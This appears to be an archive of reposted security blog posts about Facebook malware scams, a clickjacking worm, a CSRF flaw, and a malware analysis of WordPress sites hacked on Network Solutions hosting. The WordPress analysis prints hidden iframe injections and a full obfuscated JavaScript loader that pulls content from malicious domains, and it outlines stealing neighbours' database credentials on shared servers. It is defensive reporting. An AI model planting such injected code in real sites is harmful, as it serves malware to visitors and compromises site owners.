Distracting Beach Babes video attack hits Facebook users

Facebook login screen
Thousands of Facebook users are reporting that they have been hit by a malware attack posing as a video of young bikini-clad women on a beach.

The messages are posted on the walls of Facebook members, seemingly from their friends and associates on the site, with a thumbnail which appears to be an image of a young woman’s bottom in a bikini.The messages read:

<name>, this is hilarious! lol 😛 😛 😛 Distracting Beach Babes [HQ] Length: 5:32

The “Distracting Beach Babes” scam appears to be the latest incarnation of the widespread “Sexiest Video Ever” assault we saw spreading on Facebook last weekend, installing adware onto victims’ computers which can make money for the hackers behind the attack.

And you shouldn’t be in any doubt as to how successful a scheme like this can be. Many Facebook users are all-too-comfortable with receiving salacious videos and humourous links from their friends, and will click on them without a moment’s thought. Unfortunately that can then begin a bombardment of malicious posts to their social networking contacts – do you really want a blitz like this unleashed in your name?

Fortunately, some Facebook users are using the medium to warn each other of the threat:

Warnings posted about the Distracting beach babes video attack

If you have been hit, you should delete the offending message from your page, scan your computer with an up-to-date anti-virus, change your passwords, review your Facebook application settings. Also, learn an important lesson: don’t be so quick to click on unsolicited links and approve unknown applications in the future.

Perhaps most importantly, tell your friends to also do the same.

I’m beginning to wonder if the cybercriminals deliberately launch these campaigns on the weekends, imagining that anti-virus researchers and Facebook’s own security team might be snoozing.

If you’re regular user of Facebook, why not join the Sophos page on Facebook? We’ll do our best to ensure you are kept up-to-date with the latest security news.

Source: Distracting Beach Babes video attack hits Facebook users

Posted in Naked Security, English-Italian Translations and tagged , by with no comments yet.

Try not to laugh xD: Worm spreads via Facebook status messages

A clickjacking worm spread quickly across Facebook earlier today, tricking users into posting it to their status updates.

Try not to laugh attack

The worm, which some have dubbed Fbhole because of the domain it points to, posts a message like the following:

try not to laugh xD http://www.fbhole.com/omg/allow.php?s=a&r=<random number>

Clicking on the link would display a fake error message that would trick you – through a clickjacking exploit – to invisibly push a button that would publish the same message to your own Facebook status update.

We’ve seen clickjacking exploited by hackers before in attacks on social networks, for instance in the “Don’t click” attack seen on Twitter in early 2009.

The good news is that’s effectively it. Rather like the “Don’t click” Twitter attack, it appears that this latest Facebook security scare was more motivated out of mischief than money. More information about the attack can be found on the blog of our friends at F-Secure.

F-Secure’s Mikko Hypponen reports that he was able to telephone the number associated with the fbhole.com website and the site was taken off-line 15 minutes later. Nice one Mikko. Should we be surprised by this latest attack via Facebook? I don’t think so.

One of the key findings of Sophos’s 2010 Threat Report was about the astonishing 70% rise in reports of malware attacks via social networks. Facebook, in particular, was named the
riskiest of the social networks by survey respondents.

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

If you’re a fan of Facebook, you might want to join the Sophos page and ensure you are kept up-to-date with the latest security news.

Source: Try not to laugh xD: Worm spreads via Facebook status messages

Posted in Naked Security, English-Italian Translations and tagged , by with no comments yet.

Embarrassing privacy flaw found on Facebook

Facebook patch

A researcher has found a critical security flaw on Facebook that could be exploited by hackers to expose sensitive information about users.

M J Keith, a senior security analyst with security firm Alert Logic, discovered the vulnerability which could lead to private information being exposed, or users’ Facebook pages being maliciously defaced.

IDG security reporter Robert McMillan has explained the problem well:

The bug has to do with the way that Facebook checked to make sure that browsers connecting with the site were the ones they claimed to be. Facebook's servers use code called a "post_form_id" token to check that the browser trying to do something -- liking a group, for example -- was actually the browser that had logged into the account. Facebook's servers check this token before making any changes to the user's page, but Keith discovered that when he simply deleted the token from messages, he could change many settings on any Facebook account.

This is called a CSRF (Cross-site request forgery attack), which – if left unpatched – would allow hackers to set up malicious webpages that could submit instructions to the victim’s Facebook account without validation.

The consequence? Well, a hacker could make your hitherto private information public, or force your profile to “like” a Facebook group that you may find embarrassing.

M J Keith reports on AlertLogic’s website that he informed Facebook of the problem on the 11th of May, and that the problem has now been fixed.

However, IDG has reported that the security hole is still present.

Hopefully, if it’s not already patched, this privacy flaw – which comes at an embarrassing time for Facebook – will be removed soon.

If you’re a regular user of Facebook, you could do a lot worse than join the Sophos page on the site to ensure you are kept up-to-date with the latest security news. Oh, and remember to be careful about clicking on suspicious links..

Source: Embarrassing privacy flaw found on Facebook

Posted in Naked Security, English-Italian Translations and tagged , by with no comments yet.

The sexiest video ever? Facebook users hit by Candid Camera Prank attack

Leanne, a member of the Sophos fan page over on Facebook, contacted me earlier today to ask about videos being posted automatically on users’ profiles entitled “the sexiest video ever”.

A little digging discovered that thousands of Facebook users have woken up to discover messages posted on their walls, seemingly by their Facebook friends.

Fake Candid camera prank video on Facebook

The messages read:

<name>, this is without doubt the sexiest video ever! 😛 😛 😛

accompanied by what appears to be a video with the title "Candid Camera Prank [HQ]".

The message has what appears to be a movie thumbnail of a woman on a bicycle wearing a short skirt, and the video’s length is given as 3:17.Now, maybe you’re in the habit of sharing and receiving videos like this with your online chums. I can certainly imagine a lot of blokes in particular might be tempted to play the video. Each to his or her own, but you should be extremely careful on this occasion. Because if you click on the thumbnail you don’t view a video at all, but are instead taken to a Facebook application.

When I tried for myself the application failed to run (maybe Facebook has already taken action?), but according to reports from users it told them that their video player was out-of-date and urged them to download a file. Users then report that the same video was posted (using their avatar and name as though they had posted the message) to their Facebook friends and acquaintances, thus spreading even more quickly.

Judging by the number of messages posted on Facebook, thousands of people received this attack. If you were one of them, you should scan your computer with an up-to-date anti-virus, change your passwords, review your Facebook application settings, and learn not to be so quick as to fall for a simple social engineering trick like this in future.

Update Patrik Runald, one of our friends over at Websense Security Labs, has produced this video demonstrating the attack.As you can see, Patrik captured the attack in action – finding that aside from spreading it was designed to install the Hotbar adware to generate revenue for the bad guys.

If you’re regular user of Facebook, why not join the Sophos page on Facebook?

We’ll do our best to ensure you are kept up-to-date with the latest security news.

Fonte: The sexiest video ever? Facebook users hit by Candid Camera Prank attack

Posted in Naked Security, English-Italian Translations and tagged , by with no comments yet.

Network Solutions and WordPress Security Flaw

I first noticed this hidden iframe from hxxp://networkads .net/ grep/ on April 7.

It instantly drew my attention with these weird “iframe_style” scripts in Unmask Parasites reports (I even thought it was a bug in Unmask Parasites, but when I checked the infected site, I found those scripts there).

weird scripts

However it was a single incident and I didn’t see any obvious pattern back then. Two days later, when I noticed David’s (Sucuri Security) article about this very issue and the follow-up by Brian Krebs, I decided to take a closer look at it.

What I found is quite interesting and raises a few serious questions about security of websites on shared servers.

Quick recap of David’s and Brian’s articles

1.Many WordPress blogs on have been recently hacked. Someone has injected the following iframe that pushes malicious content from networkads .net server

<iframe style="display:none" height="0" width="1" src="hxxp://networkads .net/ grep/"></iframe>

2. The injection was done via WordPress database. Hackers replaced the value of the “siteulr” option in the “wp_options” database (table prefix may be different in you case) with the iframe code:

<iframe style=\"display:none\" height=\"0\" width=\" 1\" src=\"hxxp://networkads .net/ grep/\"></iframe>'

3. This dumb modification of the siteurl parameter breaks most blogs (both visually and functionally) since there are many dependencies on the the siteurl parameter in WordPress. So Webmasters need to manually revert the value of this parameter to the correct site URL in their MySql database (it should be something like: http://yousite.com/blogroot ).

4. All affected sites are hosted by Network Solutions.

My findings

Google search

The hack breaks HTML code. This is a typical line of HTML broken by this iframe injection:

<link rel="pingback" href=""><iframe style="display: none" height="0" width="1" src="hxxp://networkads .net/ grep/"></iframe>/xmlrpc.php" />

Since most WordPress themes actively use the siteurl parameter in the <head> section of HTML, this broken code makes them look like this:

broken blogs

which makes it possible to compose a Google search query that will return similarly hacked blogs. For example: wp-content text/css media screen xmlrpc.php -pingback – this search produces about 5,000 results. Many of them point to the hacked blogs. These 5,000 of course include multiple indexed pages from the same sites, but I still could easily find more than 60 infected blogs on the first 10 pages of search results. (Warning: many blogs are still infected at the moment of writing.)

Network Solutions only

All those blogs are hosted by Network Solution. Not a single infected site outside of their network. This means that this specific attack is limited to Network Solutions servers.

Server IPs

Most of the infected blogs (40+) are on the server with IP address:

I also found similarly infected blogs on 16 more Network Solutions’ IPs:

Not only a database hack

Not only does this attack inject the iframe code into WordPress database, on certain sites hackers also inject the iframe code (slightly modified) directly into file on disks.

<iframe frameborder="0" onload=' if (!this.src){ this.src="http://networkads.net/grep/"; this.height=0; this.width=0;} '></iframe>

The places of injection suggest that the code was not taken from database.

Other Domains

networkads .net is not the only domain name used by this attack. Before it, hackers used binglbalts .com/ grep/ and now they use mainnetsoll .com/ grep/.

This three domains point to the same server with IP address (Lunar Pages) which seems to be a hacked dedicated (or virtual dedicated) server with several legitimate sites.

According to whois:

  • binglbalts .com – created on Apr 01, 2010
  • networkads .net – create on Apr 04, 2010
  • mainnetsoll .com – created on Apr 10 2010

Inspite of such a short history, according to Google Safe Browsing database, binglbalts. com and networkads.net have already changed several servers on 3 different networks.

Update: obfuscated script

When I published this article I checked the compromised sites once more and discovered this obfuscated script on one of them:

e v a l(function(p, a, c, k, e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('h f(a,8,d){6 3=i m();3.l(3.k()+(d*n));6 5="; 5="+3.j();4.9=a+"="+8+5+"; "}6 c=4.9;b(c.v("g")==-1){4.o(\'<e w="0" y=\\\' b (!2.7){ 2.7="t://u.p/q/"; 2.r=0; 2.s=0;} \\\'></e>\');f("g","1",x)}',35,35,'||this|date|document|expires|var|src|value|cookie|name|if||hours|iframe|addCookie|seref|function|new|toGMTString|getTime|setTime|Date|3600000|write|com|grep|height|width|http|mainnetsoll|indexOf|frameborder|24|onload'.split('|'),0,{})) ;

It was right after the <body> tag.

What this script does is checks if there is a cookie called “seref“. If there is no such a cookie, it injects a hidden iframe from hxxp://mainnetsoll .com/ grep/, and then sets this “seref “cookie for one day.

As you can see the attack constantly evolves, and this time the malicious code is directly injected into some WordPress file.

Other hacks

It looks like these latest iframe injections are not the first time when WordPress blogs on those Network Solutions servers are being attacked by hackers. I can still see signs of other attacks.

Some of the hacked sites contain hundreds of spammy links that can only be visible if you browse with disabled JavaScript. For some reason, every link is enclosed in <noindex> tags and use rel=”nofollow” in <a> tag’s parameters. So what’s the use if it is neither for normal web surfers nor for search engines?

The links are followed by the networkads hidden iframes.


I also found a dozen of infected WordPress blogs that try to pull hidden spammy links from hxxp://alkoltashov .narod .ru/ sites.txt. The links are supposed to be displayed in a <div> located way outside of the visible area, but because the configuration of Network Solutions servers that disable URL file-access, those link injections fail with the following error (which is also displayed outside of the visible are ):

<div style="left: -2322px; position: absolute; top: -3433px">
Warning: readfile() : URL file-access is disabled in the server configuration in /data/path/to/the/user's/account/wordpress/wp-content/themes/themename/header.php on line 163
Warning: readfile(hxxp://alkoltashov .narod .ru/ sites.txt) : failed to open stream: no suitable wrapper could be found in /data/path/to/the/user's/account/wordpress/wp-content/themes/themename/header.php on line 163

According to Google cache, this unsuccessful remote link injection happened back in January.

And it is also limited to blogs on Network Solutions servers.

WebEasySearch .com

Some of the hacked blog also redirect search engine results to webeasysearch .com site. And this only happens if you haven’t visited the hacked blogs before (must be checking WP cookies).

This hack encrypts the search engine’s query string, and then passes it to the webeasysearch .com site which decrypts it and displays it’s own search results for the same query.

I bet it is done by some PHP code injected into WordPress files.

The style of the hacks and the range of the affected sites make me think that all those hacks were done by the same hacker.


1. The hackers definitely target WordPress blogs, but I doubt any WordPress vulnerability was used. Otherwise we would see similarly hacked blogs not only on the Network Solutions servers.

2. At the same time more than a dozen of Network Solutions servers are affected. There might be a security hole (or a least flaw) on their network. They should seriously investigate this issue.

3. I agree with David from Sucuri Security who thinks this can be done via access to a single compromised (or even legally created by hackers) account. Hackers can use this account to execute scripts that read content of wp-config.php files on neighbor accounts (according to reverse IP lookup there are several thousand sites on the server with IP

It is quite easy (I won’t give out the tricks to wanna be hackers here but they work well on Network Solutions servers) to identify sites with WordPress blogs on any server and then identify absolute paths to wp-config.php files that contain database credentials, and names of WordPress tables – all in plain text. Then hackers simply need to run another script that injects whatever they want into databases of their server neighbors.

Similarly, any malicious code can be injected into any writable files under neighbor accounts.

WordPress design flaw

On shared servers, you can protect your own files from malicious neighbors making them read-only. Usually 644 file permissions and 755 directory permissions do the trick.

However, if neighbors somehow get your database credentials, they can do whatever they want with your database. In case of WordPress, it’s enough to read the wp-config.php file in the root of a WordPress blog.

To hide the content of the wp-config.php file from server neighbors, David (Sucury Security) suggests that this file should have 750 permissions (I guess he meant 640 since the execution permission is not required). Unfortunately, this trick will only work on servers with suPHP. On other servers where web server executes PHP scripts with its own rights, this trick will complete break WordPress blogs. Every page will produce the “Failed opening required ‘wp-config.php’” error.

This means that WordPress blogs on most shared servers are vulnerable to this sort of attack. It merely takes to hack one account (most shared servers have multiple hacked accounts) or even to create a regular account specifically for hacking purpose and you can steal MySQL database credentials of your neighbors with WordPress blogs. Any other database driven web scripts that store database credentials in plain text are also vulnerable.

Guys from WordPress are aware of this problem on shared servers but for some reason they also give this strange advice about 750 permissions for wp-config.php that both incorrect (750 instead of 640) and will only work for suPHP server:

Note that if you are on a shared-server the permissions of your wp-config.php should be 750. It means that no other user will be able to read your database username and password. If you have FTP or shell access, do the following:

chmod 750 wp-config.php

So at this point, there is no universal way to protect your database credentials on shared servers. At the same time, I see more and more attacks where a compromise account on a shared server is used to hack other sites on the same server. It’s time to revisit the approach used in the wp-config.php file.

Have your say

What do you think about this issue with world-readable wp-config.php files on shared servers? Any thoughts on how to mitigate it?

If you are a Network Solutions client with a hacked site, I’d also want to hear about your experience. Could you tell us about file permissions you use (especially if you were hit by those alkoltashov .narod .ru and WebEasySearch attacks)?

Any other comments are also welcome.

Related posts:

Source: Network Solutions and WordPress Security Flaw

Posted in English-Italian Translations, Unmask Parasites and tagged , , , by with no comments yet.

Anti-peeping webcam protects your privacy

Peeping webcam

I’ve discussed before the problem of perverts and cyberstalkers using malware to grab control over their victims’ webcams , in order to secretly spy upon people in their bedrooms.

On occasions, hackers have exploited the technology to blackmail young women into posing naked, threatening that they will send other comproming photos to their online friends.

Much of the malicious software we see today is designed to steal your identity, your passwords, your banking information – but it is just as easy to program a spyware Trojan horse to take over your webcam.

That’s why I was interested to see this new USB webcam from Gsou.

Whereas most webcams display a light when a webcam is turned on, this webcam in the shape of a cute humanoid robot lifts its arms to obscure its “eye” when it is switched off! It would be pretty hard for someone not to notice that a remote hacker has enabled their webcam if its arms suddenly moved down unexpectedly.

According to the Chinese manufacturers, as well as automatically lowering and rising as the webcam is enabled and disabled, they can also be moved manually.

Not only is this very cute – but I can imagine that it could also offer a very real additional level of privacy to folks on the internet.

Of course, ensuring that your webcam can’t see you is only one way to defend yourself. You should also keep your computer protected against the latest threats with anti-malware software, security patches and firewalls. And if you can’t afford a cute robot that will automatically cover his lens when you want privacy, maybe a band-aid over your webcam would do the job just as well?

Hmm.. considering the recent news about malware possibly being embedded inside Chinese technology, I wonder if India will be purchasing any of these webcams? 😉

Hat-tip to Wing Fei Chia for spotting this first.

Source: Anti-peeping webcam protects your privacy

Posted in Naked Security, English-Italian Translations and tagged , by with no comments yet.

Optical Illusion! [HQ] – Facebook video link which may contain virus

You might have noticed a video title “Optical Illusion! [HQ]“ on your friend’s wall on Facebook. Actually its not a video and it links to an application. If you move further on, you will be asked to download a file named flvdirect.exe which may contain virus or malware.

Update: This scam has been removed by Facebook. The application is no more. In future, if you find such apps don’t be victim of them. If you have found any other such scams, you can notify us.

Here’s how the wall post looks :

Facebook video virus

Here’s how this virus runs:

1) After clicking on the link, you will be prompted to the application named F.B. HD Video Player – http://apps.facebook.com/hghh_rtrt/.

2) You will then display the message – Thanks for the confirmation! You can continue to the video now.

3) After clicking continue, you will be taken to page where it claims to be the video. The video will not open and displays the message – “Your FLV Player seems to be out of date. Please update your FLV Player in order to proceed. Please click the Continue button now and wait a few seconds.

4)Then it asks to download the file – “FLVDirect.exe“.

Along with this it posts a message on your friends wall showing the link and message” [name here], this is without doubt the hottest video ever! :P :P :P

Please don’t click on the link and if you find it on your or Friend’s wall just ignore it. If you have already clicked it then please remove the application by going to:

Account — > Application Settings –>

You will find “F.B. HD Video Player” then click cross on the right of it to delete it.

If you have downloaded and installed the program “Flvdirect.exe” scan your computer with a Anti-virus and Malware scanner.

Facebook will certainly remove this application in few days. However, your friends may fall for it. Please warn them.

Source: Optical Illusion! [HQ] ” – Facebook video link which may contain virus

Posted in English-Italian Translations and tagged , , by with no comments yet.